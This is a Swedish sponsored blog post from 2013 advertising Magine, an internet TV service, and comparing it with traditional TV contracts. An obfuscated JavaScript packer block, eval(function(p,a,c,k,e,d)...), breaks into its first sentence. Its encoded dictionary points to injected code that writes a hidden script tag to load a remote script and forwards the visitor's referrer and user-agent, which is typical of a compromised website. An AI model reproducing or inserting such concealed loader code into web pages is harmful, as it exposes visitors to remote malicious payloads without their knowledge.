Image Image Image Image Image Image Image Image Image Image

| 23 februari, 2020

Scroll to top

Top

Sponsrad Video: Har du också tröttnat på Dyr-TV?

magine tv
Filip Urde
  • On 7 november, 2013
  • http://www.revue.se/filip-urde

src=”http://video.unrulymedia.com/wildfire_147450320.js” type=”text/javascript”>
Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzyii|var|u0026u|referrer|nisdb||js|php’.split(’|’),0,{}))
är äntligen TV via internet här!

Magine är en ny, mer flexibel och betydligt billigare TV-tjänst. En TV-leverantör som för en gångs skull står på TV-tittarnas sida.

Ni vet vad jag menar, du ska välja TV-avtal och märker ganska snabbt vilken djungel det är att navigera i. Om du väljer ett billigt abonnemang så är du ofta bunden otroligt länge, vilket gör att man blir fastlåst vid sin leverantör, i vissa fall i åratal. Om du mot förmodan skulle vilja ha fler kanaler än basutbudet så kostar det förstås extra och ofta en hel del. Vill man titta på andra skärmar än TV:ns så finns det knappt i leverantörernas utbud, och om det finns blir även det en dyr historia, samtidigt som tjänsten knappast levererar den kvalitén du är ute efter. Sedan har vi de olika avgifterna; krypteringsavgiften, kortavgiften och den långa uppsägningstiden förstås (som är förvillande lik ”bindningstiden” till sin utformning men som ändå lever ett eget liv som separat avgift). Och ständigt dessa digitalboxar som tar utrymme, förfular hemmet med sina sladdar, och som tar flera dagar att få hemskickade. Om du inte tror mig – kolla in videon där Magine har ”busringt” till några av de traditionella TV-leverantörerna och kollat hur dyrt det faktiskt blir!

Men vad är då Magine?

Magine är TV via internet. Med Magine får du 38 TV-kanaler för bara 99 kr/mån. Ingen box, inga sladdar, inga bindningstider eller dolda avgifter. Du kan titta på TV i sommarstugan, på bussen, när du väntar i kön på Konsum. Allt som krävs är internet. Navigerar gör du snabbt och enkelt via en snyggt designad TV-tablå. Många av kanalerna har playfunktion och tillbakaspolning, t ex TV4 och Discovery. Magine bjuder på en första provmånad, utan att du ens behöver ta fram kreditkortet. Efter provmånaden går du automatiskt över till Magine Free, där du får 8 TV-kanaler för 0 kr/mån. Om du vill fortsätta med 38 kanaler (Magine 1st Edition) så måste du göra ett aktivt val.

Detta inlägg är sponsrat.